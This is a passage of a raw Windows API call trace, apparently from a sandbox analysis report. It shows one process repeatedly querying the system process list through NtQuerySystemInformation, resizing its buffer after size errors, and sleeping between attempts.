BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.158] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.174] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.189] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.210] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.220] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.238] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.257] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.268] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.283] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.299] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.314] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.330] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.345] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.362] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.390] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.412] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.423] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.439] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.456] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.471] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.486] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, 